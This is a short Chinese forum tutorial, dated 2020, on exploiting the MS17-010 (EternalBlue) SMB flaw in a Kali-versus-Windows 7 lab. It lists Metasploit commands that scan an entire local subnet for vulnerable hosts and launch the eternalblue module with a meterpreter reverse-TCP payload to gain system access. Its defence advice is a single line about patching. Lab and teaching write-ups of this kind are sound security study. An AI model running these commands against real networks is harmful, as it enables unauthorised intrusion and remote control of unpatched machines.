libo 发表于 2020-5-5 15:19:44

ms17-010实战

本帖最后由 libo 于 2020-5-5 15:22 编辑

> ms17-010 可以说是当前影响最大额一次漏洞了。在各个领域都受到了不少的冲击。今天我们一起来了解下!

!(data/attachment/forum/202005/05/152139xz9766k5zv2th7to.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "timg.jpg")

### 环境

* kali Linux
* win7(靶机)

### 漏洞扫描

```
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.123.1/24 #扫描整个局域网
exploit
```

!(data/attachment/forum/202005/05/151009gd5fdi4yzi6f1if1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "扫描")
如上,我们发现在局域网中,设备 `192.168.123.66` 存在 ms17-010 漏洞。

### 漏洞利用

```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.123.66
set payload windows/x64/meterpreter/reverse_tcp
exploti
```

!(data/attachment/forum/202005/05/151622xh6j0it01kfivc20.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "ms17-010")
成功拿下系统权限。

### 防御

请及时更新系统补丁,和安装安全软件进行系统检查。

libo 发表于 2020-5-5 15:24:12

漏洞虽然早就过时了,但是研究的心态却从未停止。:daxiao:

莫言 发表于 2020-5-5 17:58:31

新手支持下!
页: [1]
查看完整版本: ms17-010实战